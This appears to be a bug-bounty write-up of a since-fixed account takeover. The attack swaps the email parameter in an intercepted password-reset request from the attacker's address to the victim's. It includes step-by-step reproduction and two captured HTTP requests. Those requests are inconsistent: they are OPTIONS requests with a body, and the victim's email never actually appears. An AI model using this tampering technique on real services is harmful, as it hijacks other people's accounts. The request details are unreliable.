Account take over — Write up:)
Hello everyone, how are you all , I wish you all well, Most of the applications provide the user’s with functionality to “Reset Password” via email. This functionality has always been a part of interest for most of the Bounty Hunters or Security Researchers. From performing basic attacks such as Rate Limiting, Host Header Injections and performing account takeovers, this functionality is total fun and a big win to invest time in.
and i found this bug on this week
- Reporting time 06 August 2020 16:15:22
- accepted time 06 August 2020
- Fixed bug time 06 August 2020 21:12
Account take over via reset password
in this case, I will show you where is injection point and how to reproduce it
Injection point
find reset password on application
How to reproduce it?
Let’s assume you’re a hacker and you want to take over an account
- find reset password on an application
- ask for reset password on your mail
- open your mail and set up a new password
- and capture HTTP request on the application
OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer:
https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: closefocus on email ducky%40example.com(this is hacker account)
and change to victim email example victim@exaple.com(change @ to %40 “victim%40example.com”)
and forward the request
OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer:
https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Cookie:
XSRF-TOKEN=JALKJDUIEHDjlkjlkjdoijekjIHJlkjlijdeoiujlkdamOIHJkjoi3j298jiJOIJ8UJLIJlkjoijo
session=ijoi8UOIJOIJKlj98u9jKJLJ198UJLKJLKJJIJijiklkjoijlkj&*^&%*(HJhiu*&8udk{"email":"ducky@example.com","password":"Jakarta123!","c_password":"Jakarta123!","token":"*jdiujoij9IOK98uoiKJ98UjoiKJ098"}
look at the bold text its hacker account and change to victim account, lets forward the request and stop the capture
finally, victim account has been successful to take over
